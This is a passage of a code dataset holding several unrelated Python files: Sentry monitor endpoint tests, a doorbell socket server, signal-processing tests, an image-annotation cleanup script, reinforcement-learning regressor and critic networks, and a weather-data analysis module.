self.project.slug,\n \"name\": \"My Monitor\",\n \"slug\": \"my-monitor\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data)\n\n assert response.data[\"slug\"] == \"my-monitor\"\n\n def test_invalid_numeric_slug(self):\n data = {\n \"project\": self.project.slug,\n \"name\": \"My Monitor\",\n \"slug\": \"1234\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_error_response(self.organization.slug, **data, status_code=400)\n assert response.data[\"slug\"][0] == DEFAULT_SLUG_ERROR_MESSAGE\n\n def test_generated_slug_not_entirely_numeric(self):\n data = {\n \"project\": self.project.slug,\n \"name\": \"1234\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n response = self.get_success_response(self.organization.slug, **data, status_code=201)\n\n slug = response.data[\"slug\"]\n assert slug.startswith(\"1234-\")\n assert not slug.isdecimal()\n\n @override_settings(MAX_MONITORS_PER_ORG=2)\n def test_monitor_organization_limit(self):\n for i in range(settings.MAX_MONITORS_PER_ORG):\n data = {\n \"project\": self.project.slug,\n \"name\": f\"Unicron-{i}\",\n \"slug\": f\"unicron-{i}\",\n \"type\": \"cron_job\",\n \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n }\n self.get_success_response(self.organization.slug, **data)\n\n data = {\n \"project\": 
self.project.slug,\n            \"name\": f\"Unicron-{settings.MAX_MONITORS_PER_ORG + 1}\",\n            \"slug\": f\"unicron-{settings.MAX_MONITORS_PER_ORG + 1}\",\n            \"type\": \"cron_job\",\n            \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n        }\n        self.get_error_response(self.organization.slug, status_code=403, **data)\n\n    def test_simple_with_alert_rule(self):\n        data = {\n            \"project\": self.project.slug,\n            \"name\": \"My Monitor\",\n            \"type\": \"cron_job\",\n            \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n            \"alert_rule\": {\n                \"environment\": self.environment.name,\n                \"targets\": [{\"targetIdentifier\": self.user.id, \"targetType\": \"Member\"}],\n            },\n        }\n        response = self.get_success_response(self.organization.slug, **data)\n\n        monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n        alert_rule_id = monitor.config.get(\"alert_rule_id\")\n        rule = Rule.objects.get(\n            project_id=monitor.project_id, id=alert_rule_id, source=RuleSource.CRON_MONITOR\n        )\n        assert rule is not None\n        assert rule.environment_id == self.environment.id\n\n    def test_checkin_margin_zero(self):\n        # Invalid checkin margin\n        #\n        # XXX(epurkhiser): We currently transform 0 -> 1 for backwards\n        # compatibility. If we remove the custom transformer in the config\n        # validator this test will change to a get_error_response test.\n        data = {\n            \"project\": self.project.slug,\n            \"name\": \"My Monitor\",\n            \"slug\": \"cron_job\",\n            \"type\": \"cron_job\",\n            \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\", \"checkin_margin\": 0},\n        }\n        response = self.get_success_response(self.organization.slug, **data)\n        assert Monitor.objects.get(slug=response.data[\"slug\"]).config[\"checkin_margin\"] == 1\n\n    @patch(\"sentry.quotas.backend.assign_monitor_seat\")\n    def test_create_monitor_assigns_seat(self, assign_monitor_seat):\n        assign_monitor_seat.return_value = Outcome.ACCEPTED\n\n        data = {\n            \"project\": self.project.slug,\n            \"name\": \"My Monitor\",\n            \"type\": \"cron_job\",\n            \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n        }\n        response = self.get_success_response(self.organization.slug, **data)\n\n        monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n\n        assign_monitor_seat.assert_called_with(monitor)\n        assert monitor.status == ObjectStatus.ACTIVE\n\n    @patch(\"sentry.quotas.backend.assign_monitor_seat\")\n    def test_create_monitor_without_seat(self, assign_monitor_seat):\n        assign_monitor_seat.return_value = Outcome.RATE_LIMITED\n\n        data = {\n            \"project\": self.project.slug,\n            \"name\": \"My Monitor\",\n            \"type\": \"cron_job\",\n            \"config\": {\"schedule_type\": \"crontab\", \"schedule\": \"@daily\"},\n        }\n        response = self.get_success_response(self.organization.slug, **data)\n\n        monitor = Monitor.objects.get(slug=response.data[\"slug\"])\n\n        assert assign_monitor_seat.called\n        assert response.data[\"status\"] == \"disabled\"\n        assert monitor.status == ObjectStatus.DISABLED\n","repo_name":"getsentry/sentry","sub_path":"tests/sentry/monitors/endpoints/test_organization_monitor_index.py","file_name":"test_organization_monitor_index.py","file_ext":"py","file_size_in_byte":13063,"program_lang":"python","lang":"en","doc_type":"code","stars":35611,"dataset":"github-code","pt":"92"}{"seq_id":"74337691181","text":"from helper import USER_ADDR_INFO, END_AUDIO, END_IMAGE, RECEIVED_AUDIO, RECEIVED_IMAGE, DATE_LEN, data_to_file\nfrom routes import APP, update\nimport os\nimport socket\nimport datetime\nimport threading\nimport signal\nimport yaml\n
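# plot is assumed to be a project-local module; plot.plot() re-renders the chart of stored press times\n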
import plot\n\nDATETIMES: list[datetime.datetime] = []\n\ndef server():\n\t'''\n\tServer code to receive data from the doorbell\n\tincluding a datetime object when the doorbell is pressed,\n\tan image taken at the door and\n\tan audio recording\n\t'''\n\twhile True:\n\t\tconn, _ = server_socket.accept()\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdate = conn.recv(DATE_LEN)\n\t\t\t\ttry:\n\t\t\t\t\t# Add a datetime object to the database\n\t\t\t\t\tdate = datetime.datetime.strptime(date.decode(), '%Y-%m-%d %w %H:%M:%S')\n\t\t\t\t\tprint(date)\n\t\t\t\t\tDATETIMES.append(date)\n\t\t\t\t\twith open('datetimes.yml', 'w') as file:\n\t\t\t\t\t\tyaml.dump(DATETIMES, file)\n\t\t\t\t\tplot.plot(DATETIMES)\n\t\t\t\t\tconn.send(b'received date')\n\t\t\t\texcept Exception:\n\t\t\t\t\tconn.send(b'invalid date')\n\n\t\t\t\t# Receive the image and audio data and write to files\n\t\t\t\tdata_to_file(conn, 'static/assets/in.jpeg', END_IMAGE, RECEIVED_IMAGE)\n\t\t\t\tdata_to_file(conn, 'static/assets/in.wav', END_AUDIO, RECEIVED_AUDIO)\n\n\t\t\t\t# Set the flag so the frontend can receive an update\n\t\t\t\tupdate()\n\t\t\texcept Exception:\n\t\t\t\tconn.close()\n\t\t\t\tprint('Lost connection with the doorbell')\n\t\t\t\tbreak\n\nif __name__ == '__main__':\n\t# Read in the database which stores all the datetimes when the doorbell was pressed\n\tif not os.path.isfile('datetimes.yml'):\n\t\topen('datetimes.yml', 'w').close()\n\twith open('datetimes.yml', 'r') as file:\n\t\t# full_load returns None for an empty file, so fall back to an empty list\n\t\tDATETIMES = yaml.full_load(file) or []\n\n\t# Start a server on a different thread to listen for requests from the doorbell\n\tserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ttry:\n\t\tserver_socket.bind(('', USER_ADDR_INFO[1]))\n\t\t# Only allows 1 connection at a time\n\t\tserver_socket.listen(1)\n\t\tthreading.Thread(target=server).start()\n\t\tprint(f'Server is listening on port {USER_ADDR_INFO[1]}')\n\texcept Exception as error:\n\t\tprint(f'Failed to start the server: {error}')\n\t\tserver_socket.close()\n\t\texit(1)\n\n\t# Run the Flask server on a different thread\n\tthreading.Thread(target=lambda: APP.run(use_reloader=False)).start()\n\n\t# Close the socket when Control-C is pressed to end the program\n\tdef handler(*_):\n\t\tserver_socket.close()\n\t\texit(0)\n\n\tsignal.signal(signal.SIGINT, handler)\n","repo_name":"Kaiqi-Liang/CITS5506-Project","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}{"seq_id":"4598974428","text":"import unittest\nfrom saffy import SignalManager\nfrom ..mocks import sine_wave\nimport scipy.signal as ss\nimport numpy as np\n\n\nclass TestWelchPlugin(unittest.TestCase):\n\tdef test_welch_spectrum(self):\n\t\tfreq = 50\n\t\tphase = np.pi/2\n\n\t\tgenerator = sine_wave(freq=freq, phase=phase)\n\t\tsig = SignalManager(generator=generator)\n\n\t\tsig.welch_spectrum()\n\n\t\tfreq, spec = ss.welch(generator['data'], generator['fs'])\n\n\t\tself.assertTrue(np.allclose(sig.spectrum, spec))\n\t\tself.assertTrue(np.allclose(sig.spectrum_freqs, freq))\n\n\tdef test_welch_mean_spectrum(self):\n\t\tfreq = 50\n\t\tphase = np.pi / 2\n\n\t\tdata = {\n\t\t\t'fs': 512,\n\t\t\t'num_channels': 1,\n\t\t\t'channel_names': ['sine'],\n\t\t\t'epochs': 10\n\t\t}\n\n\t\tgenerator = sine_wave(freq=freq, phase=phase, data=data)\n\t\tsig = SignalManager(generator=generator)\n\n\t\tsig.welch_mean_spectrum()\n\n\t\tfreq, spec = ss.welch(generator['data'], generator['fs'])\n\n\t\t
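# average the per-epoch spectra along axis 0 into a single mean spectrum\n\t\t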
mean_spec = np.mean(spec, 0)\n\n\t\tself.assertTrue(np.allclose(sig.spectrum, mean_spec))\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"saffy-team/saffy","sub_path":"tests/plugins/Welch.py","file_name":"Welch.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}{"seq_id":"20655918066","text":"# Clean up mismatches between the jpeg images and their xml annotations\nimport os\n\njpeg = './sources/images/'\njpeg_list = os.listdir(jpeg)\n\nanno = './sources/Annotation'\nanno_list = os.listdir(anno)\n\n# Remove images that have no matching xml annotation\nfor pic in jpeg_list:\n    name = pic.split('.')[0]\n    anno_name = name + '.xml'\n    #print(anno_name)\n    if anno_name not in anno_list:\n        os.remove(os.path.join(jpeg,pic))","repo_name":"WangRongsheng/KDAT","sub_path":"autoLabel/tools-clear_xml_imges.py","file_name":"tools-clear_xml_imges.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"92"}{"seq_id":"73649585901","text":"import numpy as np\n\nimport sandbox.rocky.tf.core.layers as L\nfrom sandbox.rocky.tf.core.layers_powered import LayersPowered\nfrom sandbox.rocky.tf.core.network import MLP\nfrom sandbox.rocky.tf.misc import tensor_utils\nfrom sandbox.rocky.tf.optimizers.lbfgs_optimizer import LbfgsOptimizer\nfrom sandbox.rocky.tf.optimizers.penalty_lbfgs_optimizer import PenaltyLbfgsOptimizer\nfrom sandbox.rocky.tf.distributions.diagonal_gaussian import DiagonalGaussian\nfrom rllab.core.serializable import Serializable\nfrom rllab.misc import logger\nimport tensorflow as tf\n\n\nclass GaussianMLPRegressor(LayersPowered, Serializable):\n    \"\"\"\n    A class for performing regression by fitting a Gaussian distribution to the outputs.\n    \"\"\"\n\n    def __init__(\n            self,\n            name,\n            input_shape,\n            output_dim,\n            mean_network=None,\n            hidden_sizes=(32, 32),\n            hidden_nonlinearity=tf.nn.tanh,\n            optimizer=None,\n            use_trust_region=True,\n            step_size=0.01,\n            learn_std=True,\n            init_std=1.0,\n            adaptive_std=False,\n            std_share_network=False,\n            std_hidden_sizes=(32, 32),\n            std_nonlinearity=None,\n            normalize_inputs=True,\n            normalize_outputs=True,\n            subsample_factor=1.0\n    ):\n        \"\"\"\n        :param input_shape: Shape of the input data.\n        :param output_dim: Dimension of output.\n        :param hidden_sizes: Number of hidden units of each layer of the mean network.\n        :param hidden_nonlinearity: Non-linearity used for each layer of the mean network.\n        :param optimizer: Optimizer for minimizing the negative log-likelihood.\n        :param use_trust_region: Whether to use trust region constraint.\n        :param step_size: KL divergence constraint for each iteration\n        :param learn_std: Whether to learn the standard deviations. Only effective if adaptive_std is False. If\n        adaptive_std is True, this parameter is ignored, and the weights for the std network are always learned.\n        :param adaptive_std: Whether to make the std a function of the states.\n        :param std_share_network: Whether to use the same network as the mean.\n        :param std_hidden_sizes: Number of hidden units of each layer of the std network. Only used if\n        `std_share_network` is False. It defaults to the same architecture as the mean.\n        :param std_nonlinearity: Non-linearity used for each layer of the std network. Only used if `std_share_network`\n        is False. 
It defaults to the same non-linearity as the mean.\n \"\"\"\n Serializable.quick_init(self, locals())\n\n with tf.variable_scope(name):\n\n if optimizer is None:\n if use_trust_region:\n optimizer = PenaltyLbfgsOptimizer(\"optimizer\")\n else:\n optimizer = LbfgsOptimizer(\"optimizer\")\n\n self._optimizer = optimizer\n self._subsample_factor = subsample_factor\n\n if mean_network is None:\n mean_network = MLP(\n name=\"mean_network\",\n input_shape=input_shape,\n output_dim=output_dim,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None,\n )\n\n l_mean = mean_network.output_layer\n\n if adaptive_std:\n l_log_std = MLP(\n name=\"log_std_network\",\n input_shape=input_shape,\n input_var=mean_network.input_layer.input_var,\n output_dim=output_dim,\n hidden_sizes=std_hidden_sizes,\n hidden_nonlinearity=std_nonlinearity,\n output_nonlinearity=None,\n ).output_layer\n else:\n l_log_std = L.ParamLayer(\n mean_network.input_layer,\n num_units=output_dim,\n param=tf.constant_initializer(np.log(init_std)),\n name=\"output_log_std\",\n trainable=learn_std,\n )\n\n LayersPowered.__init__(self, [l_mean, l_log_std])\n\n xs_var = mean_network.input_layer.input_var\n ys_var = tf.placeholder(dtype=tf.float32, name=\"ys\", shape=(None, output_dim))\n old_means_var = tf.placeholder(dtype=tf.float32, name=\"ys\", shape=(None, output_dim))\n old_log_stds_var = tf.placeholder(dtype=tf.float32, name=\"old_log_stds\", shape=(None, output_dim))\n\n x_mean_var = tf.Variable(\n np.zeros((1,) + input_shape, dtype=np.float32),\n name=\"x_mean\",\n )\n x_std_var = tf.Variable(\n np.ones((1,) + input_shape, dtype=np.float32),\n name=\"x_std\",\n )\n y_mean_var = tf.Variable(\n np.zeros((1, output_dim), dtype=np.float32),\n name=\"y_mean\",\n )\n y_std_var = tf.Variable(\n np.ones((1, output_dim), dtype=np.float32),\n name=\"y_std\",\n )\n\n normalized_xs_var = (xs_var - x_mean_var) / x_std_var\n normalized_ys_var = (ys_var - y_mean_var) / y_std_var\n\n normalized_means_var = L.get_output(l_mean, {mean_network.input_layer: normalized_xs_var})\n normalized_log_stds_var = L.get_output(l_log_std, {mean_network.input_layer: normalized_xs_var})\n\n means_var = normalized_means_var * y_std_var + y_mean_var\n log_stds_var = normalized_log_stds_var + tf.log(y_std_var)\n\n normalized_old_means_var = (old_means_var - y_mean_var) / y_std_var\n normalized_old_log_stds_var = old_log_stds_var - tf.log(y_std_var)\n\n dist = self._dist = DiagonalGaussian(output_dim)\n\n normalized_dist_info_vars = dict(mean=normalized_means_var, log_std=normalized_log_stds_var)\n\n mean_kl = tf.reduce_mean(dist.kl_sym(\n dict(mean=normalized_old_means_var, log_std=normalized_old_log_stds_var),\n normalized_dist_info_vars,\n ))\n\n loss = - tf.reduce_mean(dist.log_likelihood_sym(normalized_ys_var, normalized_dist_info_vars))\n\n self._f_predict = tensor_utils.compile_function([xs_var], means_var)\n self._f_pdists = tensor_utils.compile_function([xs_var], [means_var, log_stds_var])\n self._l_mean = l_mean\n self._l_log_std = l_log_std\n\n optimizer_args = dict(\n loss=loss,\n target=self,\n network_outputs=[normalized_means_var, normalized_log_stds_var],\n )\n\n if use_trust_region:\n optimizer_args[\"leq_constraint\"] = (mean_kl, step_size)\n optimizer_args[\"inputs\"] = [xs_var, ys_var, old_means_var, old_log_stds_var]\n else:\n optimizer_args[\"inputs\"] = [xs_var, ys_var]\n\n self._optimizer.update_opt(**optimizer_args)\n\n self._use_trust_region = use_trust_region\n self._name = name\n\n 
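# keep handles to the normalization variables and sub-networks; fit() re-assigns them in-session\n            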
self._normalize_inputs = normalize_inputs\n            self._normalize_outputs = normalize_outputs\n            self._mean_network = mean_network\n            self._x_mean_var = x_mean_var\n            self._x_std_var = x_std_var\n            self._y_mean_var = y_mean_var\n            self._y_std_var = y_std_var\n\n    def fit(self, xs, ys):\n        if self._subsample_factor < 1:\n            num_samples_tot = xs.shape[0]\n            idx = np.random.randint(0, num_samples_tot, int(num_samples_tot * self._subsample_factor))\n            xs, ys = xs[idx], ys[idx]\n\n        sess = tf.get_default_session()\n        if self._normalize_inputs:\n            # recompute normalizing constants for inputs\n            sess.run([\n                tf.assign(self._x_mean_var, np.mean(xs, axis=0, keepdims=True)),\n                tf.assign(self._x_std_var, np.std(xs, axis=0, keepdims=True) + 1e-8),\n            ])\n        if self._normalize_outputs:\n            # recompute normalizing constants for outputs\n            sess.run([\n                tf.assign(self._y_mean_var, np.mean(ys, axis=0, keepdims=True)),\n                tf.assign(self._y_std_var, np.std(ys, axis=0, keepdims=True) + 1e-8),\n            ])\n        if self._use_trust_region:\n            old_means, old_log_stds = self._f_pdists(xs)\n            inputs = [xs, ys, old_means, old_log_stds]\n        else:\n            inputs = [xs, ys]\n        loss_before = self._optimizer.loss(inputs)\n        if self._name:\n            prefix = self._name + \"_\"\n        else:\n            prefix = \"\"\n        logger.record_tabular(prefix + 'LossBefore', loss_before)\n        self._optimizer.optimize(inputs)\n        loss_after = self._optimizer.loss(inputs)\n        logger.record_tabular(prefix + 'LossAfter', loss_after)\n        if self._use_trust_region:\n            logger.record_tabular(prefix + 'MeanKL', self._optimizer.constraint_val(inputs))\n        logger.record_tabular(prefix + 'dLoss', loss_before - loss_after)\n\n    def predict(self, xs):\n        \"\"\"\n        Return the maximum likelihood estimate of the predicted y.\n        :param xs:\n        :return:\n        \"\"\"\n        return self._f_predict(xs)\n\n    def sample_predict(self, xs):\n        \"\"\"\n        Sample one possible output from the prediction distribution.\n        :param xs:\n        :return:\n        \"\"\"\n        means, log_stds = self._f_pdists(xs)\n        return self._dist.sample(dict(mean=means, log_std=log_stds))\n\n    def predict_log_likelihood(self, xs, ys):\n        means, log_stds = self._f_pdists(xs)\n        return self._dist.log_likelihood(ys, dict(mean=means, log_std=log_stds))\n\n    def log_likelihood_sym(self, x_var, y_var):\n        normalized_xs_var = (x_var - self._x_mean_var) / self._x_std_var\n\n        normalized_means_var, normalized_log_stds_var = \\\n            L.get_output([self._l_mean, self._l_log_std], {self._mean_network.input_layer: normalized_xs_var})\n\n        means_var = normalized_means_var * self._y_std_var + self._y_mean_var\n        log_stds_var = normalized_log_stds_var + tf.log(self._y_std_var)\n\n        return self._dist.log_likelihood_sym(y_var, dict(mean=means_var, log_std=log_stds_var))\n\n    def get_param_values(self, **tags):\n        return LayersPowered.get_param_values(self, **tags)\n\n    def set_param_values(self, flattened_params, **tags):\n        LayersPowered.set_param_values(self, flattened_params, **tags)\n","repo_name":"rll/rllab","sub_path":"sandbox/rocky/tf/regressors/gaussian_mlp_regressor.py","file_name":"gaussian_mlp_regressor.py","file_ext":"py","file_size_in_byte":10577,"program_lang":"python","lang":"en","doc_type":"code","stars":2825,"dataset":"github-code","pt":"92"}{"seq_id":"5649645381","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import layer\n\nclass Critic():\n\n    def __init__(self, sess, action_space_size, env_space_size, learning_rate=0.001, gamma=0.99, tau=0.001):\n        self.sess = sess\n        self.learning_rate = learning_rate\n        self.gamma = gamma\n        self.tau = tau\n        self.loss_val = 0\n        self.state_ph = tf.placeholder(tf.float32, 
shape=(None, env_space_size), name='state_ph')\n self.action_ph = tf.placeholder(tf.float32, shape=(None, action_space_size), name='action_ph')\n\n self.features_ph = tf.concat([self.state_ph, self.action_ph], axis=1)\n\n self.infer = self.create_nn(self.features_ph)\n self.weights = [v for v in tf.trainable_variables() if 'critic' in v.op.name]\n\n # Target network code \"repurposed\" from Patrick Emani :^)\n self.target = self.create_nn(self.features_ph, name='critic_target')\n self.target_weights = [v for v in tf.trainable_variables() if 'critic' in v.op.name][len(self.weights):]\n\n self.update_target_weights = \\\n\t [self.target_weights[i].assign(tf.multiply(self.weights[i], self.tau) +\n tf.multiply(self.target_weights[i], 1. - self.tau))\n for i in range(len(self.target_weights))]\n\t\n self.wanted_qs = tf.placeholder(tf.float32, shape=(None, 1))\n\n self.loss = tf.reduce_mean(tf.square(self.wanted_qs - self.infer))\n\n self.train = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)\n\n self.gradient = tf.gradients(self.infer, self.action_ph)\n\n def update(self, old_states, old_actions, rewards, new_states, new_actions, is_terminals):\n wanted_qs = self.sess.run(self.target,\n feed_dict={\n self.state_ph: new_states,\n self.action_ph: new_actions\n })\n \n for i in range(len(wanted_qs)):\n if is_terminals[i]:\n wanted_qs[i] = rewards[i]\n else:\n wanted_qs[i] = rewards[i] + self.gamma * wanted_qs[i][0]\n\n self.loss_val, _ = self.sess.run([self.loss, self.train],\n feed_dict={\n self.state_ph: old_states,\n self.action_ph: old_actions,\n self.wanted_qs: wanted_qs \n })\n\n self.sess.run(self.update_target_weights)\n\n def get_gradients(self, state, action):\n grads = self.sess.run(self.gradient,\n feed_dict={\n self.state_ph: state,\n self.action_ph: action\n })\n\n return grads[0]\n\n def create_nn(self, features, name='critic'):\n with tf.variable_scope(name + '_fc_1'):\n fc1 = layer(features, 400)\n with tf.variable_scope(name + '_fc_2'):\n fc2 = layer(fc1, 300)\n with tf.variable_scope(name + '_fc_3'):\n fc3 = layer(fc2, 1, is_output=True)\n\n return fc3\n","repo_name":"mluogh/reinforcement","sub_path":"ddpg/critic.py","file_name":"critic.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"92"} +{"seq_id":"31462640590","text":"from operator import ge\nfrom functions.dataset import get_cleaned_data\nfrom functions.input import input_capitalization\n\ndef get_column_names ():\n '''Returns the column names of the dataset.'''\n\n cleaned_data = get_cleaned_data()\n\n return cleaned_data[0]\n\n\ndef get_data_by_header_list(headers: 'list', start: int = 1, end: int = 0):\n '''Retrieves all data within the columns listed inside the input list,\n \n arg: list of column names (ex. ['Year', 'Day']),\n \n returns a list of data based on the inputed headers.'''\n\n header_indexes = header_title_to_header_index(headers)\n\n data_based_on_headers = []\n\n for header_index in header_indexes:\n data_by_index = get_data_by_column_index(header_index, start, end)\n\n data_based_on_headers.append(data_by_index)\n \n merged_data = merge_list_data(data_based_on_headers)\n\n return merged_data\n\n\ndef merge_list_data(data: list[list]):\n '''Merges the contents of a list of lists by index,\n \n ex. 
[['YEAR', '2018'], ['DAY', '23']] => [['YEAR', 'DAY'], ['2018', '23']],\n \n arg: a list of column data as individual lists,\n\n returns a list of lists based on the format of the dataset.'''\n merged_list = []\n index_counter = 0\n \n while index_counter < len(data[0]):\n comb_row = []\n\n for element in data:\n comb_row.append(element[index_counter])\n\n merged_list.append(comb_row)\n index_counter += 1\n\n return merged_list\n\n\ndef header_title_to_header_index(headers: list):\n '''Matches the header title (of type string within a list) \n to the appropriate header index of the dataset,\n \n ex. ['Year', 'Day'] => [3, 5],\n\n arg: a list containing header titles of type string,\n \n returns a list of the header indexes as integers.'''\n header_indexes = []\n\n column_names = get_column_names()\n\n for element in headers:\n header = input_capitalization(element)\n\n for index, element in enumerate(column_names):\n if header == element:\n header_indexes.append(index)\n \n return header_indexes\n\n\ndef get_data_by_column_index(index: int, start: int = 1, end: int = 0):\n '''Extracts all data of the indexed column and returns them as a list,\n \n ex. index = 3 => returning all data of column 'YEAR' as a list,\n\n args: column index as integer, \n starting row as integer (default: first row, starting index: 1),\n final row as integer (default: last row)\n \n returns the data inside the indexed column as a list.'''\n \n cleaned_data = get_cleaned_data()\n\n column_data = []\n\n if end == 0:\n # deliberately exclude last row from looping since it is empty\n end = len(cleaned_data)\n\n for row in range(start - 1, end):\n column_data.append(cleaned_data[row][index])\n\n return column_data\n\n\n\ndef get_data_by_row(index: int):\n '''Extracts all data of the indexed row and returns them as a list,\n \n ex. index = 3 => returning all data of row 3 as a list,\n\n arg: row index as an integer, \n \n returns the data inside the indexed row as a list.'''\n\n cleaned_data = get_cleaned_data()\n\n row_data = cleaned_data[index]\n\n return row_data\n\n\ndef find_in_row_by_header(row: int, column_header: list):\n '''Retrieves the value which corresponds to the indexed row and column header,\n \n ex. 
row = 3,\n column_header = 'YEAR' => returns the value of column 'YEAR' in row 3,\n\n arg: row index as an integer, \n column_header as a list\n\n returns the value corresponding to the indexed row and column header as a string.'''\n\n row_data = get_data_by_row(row)\n\n column_indices = header_title_to_header_index(column_header)\n\n for index in column_indices:\n row_header_value = row_data[index]\n return row_header_value\n\ndef get_highest_lowest_year(year_boundary: str = 'MAX'):\n '''Finds the maximum or the minimum available year in the dataset and returns that year,\n \n arg: string of value either 'MAX' or 'MIN',\n \n returns either the minimum or the maximum year.'''\n\n header_list = ['YEAR']\n data = get_data_by_header_list(header_list)\n\n data.sort()\n\n if year_boundary == 'MIN':\n return data[0]\n else:\n return data[-2]\n\n\n# Task5 solution ~ @konspapp\ndef get_highest_temperature_by_year(year_min: int = 2006, year_max: int = 2018):\n '''Calculates and prints the highest temperature of every year,\n \n no-arg (default): Calculates between the lowest and the highest available year,\n arg1 (optional): lower boundary year as integer,\n arg2 (optional): upper boundary year as integer,\n \n prints the highest recorded temperature for each year.'''\n\n header_list = ['YEAR', 'HIGH_TEMP']\n data = get_data_by_header_list(header_list)\n\n highest_temp = 0\n\n for year in range(year_min, year_max + 1):\n for row in range(1, len(data)):\n temperature = data[row][1]\n\n try:\n temperature = float(temperature)\n except:\n continue\n\n if data[row][0] == str(year):\n if temperature > highest_temp:\n highest_temp = temperature\n\n highest_temp_of_year = highest_temp\n\n highest_temp = 0\n print('The highest temperature recorded in ' + str(year) + ' had a value of ' + str(highest_temp_of_year))\n\n\n# Task6 solution ~ @konspapp\ndef get_highest_amount_of_rain():\n '''Calculates and displays the region with the highest amount of rain.'''\n\n header_list = ['STATION_REGION', 'STATION_NAME', 'YEAR', 'MONTH', 'DAY', 'RAIN']\n data = get_data_by_header_list(header_list)\n\n max_rain = 0\n\n for row in range(1, len(data)):\n rain = data[row][5]\n\n try:\n rain = float(rain)\n\n except:\n continue\n\n if rain > max_rain:\n max_rain = rain\n result = [data[row][0], data[row][1], data[row][2], data[row][3], data[row][4], data[row][5], ]\n\n print(f'{result[1]} station in {result[0]} had the highest amount of rain ({result[5]}) on {result[4]}/{result[3]}/{result[2]}')\n\n\n# -------------vandl's work-----------------------------------------------------------------------------#\n\n\n# creating a middle term function for later use.\ndef middleterm(arg):\n num_arg = []\n for i in arg:\n try:\n num_arg.append(float(i))\n except:\n continue\n return (sum(num_arg) / len(num_arg))\n\n\ndef five_highestorlowest_temperature_cities_in2018(arguement=\"none\"):\n\n # Takes High, low , or none as argument and returns the 5 cities with lowest/highest temperature average in 2018\n\n cleaned_data = get_cleaned_data()\n\n arguement = arguement.lower() # making argument case-insensitive\n\n # filtering data\n\n data_in2018 = []\n # year_index = getindex(\"STATION NAME\")\n\n for i in cleaned_data:\n #\n if i[3] == \"2018\":\n data_in2018.append(i)\n else:\n continue\n\n # data_in2018 now has CSV rows only from year 2018\n # headers NOT included in data_in2018!\n # creating a list with all cities once\n\n cities = []\n for i in data_in2018:\n if i[2] not in cities:\n cities.append(i[2])\n\n high_temp_dictionary = 
{}\n    low_temp_dictionary = {}\n\n    for i in cities:\n        low_temp_dictionary[i] = []\n\n    for i in cities:\n        high_temp_dictionary[i] = []\n    # {'Αγία Κυριακή Ιωαννίνων': [], 'Άρτα': []...\n\n    for key in low_temp_dictionary:\n        # creating variable as already existing key's value, appending in var the items we need and then putting var\n        # back in key as value\n        for row in data_in2018:\n            if row[2] == key:\n                var = low_temp_dictionary[key] # this is the key's value!\n                var.append(row[9])\n                low_temp_dictionary[key] = var\n\n    # the low-temperature dictionary now has all low temperatures in a list as value for every key (city).\n\n    # finding middle term of each value and putting it as the new value in dictionary, using same logic as above.\n\n    for key in low_temp_dictionary:\n        var = low_temp_dictionary[key]\n        low_temp_dictionary[key] = middleterm(var)\n\n    # same for highest temps. 110- 133 are the only lines I could find a way not to duplicate...\n\n    for key in high_temp_dictionary:\n        # creating variable as already existing key's value, appending in var the items we need and then putting var\n        # back in key as value\n        for row in data_in2018:\n            if row[2] == key:\n                var = high_temp_dictionary[key] # this is the key's value!\n                var.append(row[7])\n                high_temp_dictionary[key] = var\n\n    # the low- and high-temperature dictionaries now have all temperatures in a list as value for every key (\n    # city).\n\n    # finding middle term of each value and putting it as the new value in dictionary, using same logic as above.\n\n    for key in high_temp_dictionary:\n        var = high_temp_dictionary[key]\n        high_temp_dictionary[key] = middleterm(var)\n\n    lowest_temperature_cities2018 = []\n    highest_temperature_cities2018 = []\n\n    # append the 5 coldest and 5 hottest cities, selected by their average temperature\n    for i in range(5):\n        coldest = min(low_temp_dictionary, key=low_temp_dictionary.get)\n        lowest_temperature_cities2018.append(coldest)\n        low_temp_dictionary.pop(coldest)\n        hottest = max(high_temp_dictionary, key=high_temp_dictionary.get)\n        highest_temperature_cities2018.append(hottest)\n        high_temp_dictionary.pop(hottest)\n\n    # returning data according to the user's argument\n    if arguement == \"none\":\n        return \"The cities with lowest temperatures in 2018 are: \" + \", \".join(\n            lowest_temperature_cities2018) + \".\" + \"\\n\" + \"The cities with highest temperatures in 2018 are: \" + \", \".join(\n            highest_temperature_cities2018) + \".\"\n    elif arguement == \"low\":\n        return \"The cities with lowest temperatures in 2018 are: \" + \", \".join(lowest_temperature_cities2018) + \".\"\n    elif arguement == \"high\":\n        return \"The cities with highest temperatures in 2018 are: \" + \", \".join(highest_temperature_cities2018) + \".\"\n    else:\n        return \"Invalid argument. Valid arguments are High, Low or no argument.\"\n\n\n# ----------------------------- task 4 ---------------------------------------\n\ndef middleterm_of_place_in_2006_and_2018(region):\n\n    # Takes a Greek region as argument and compares the average temperature in 2018 with the average temperature in\n    # year N, where N is the year with the most data to compare against.\n    # e.g. 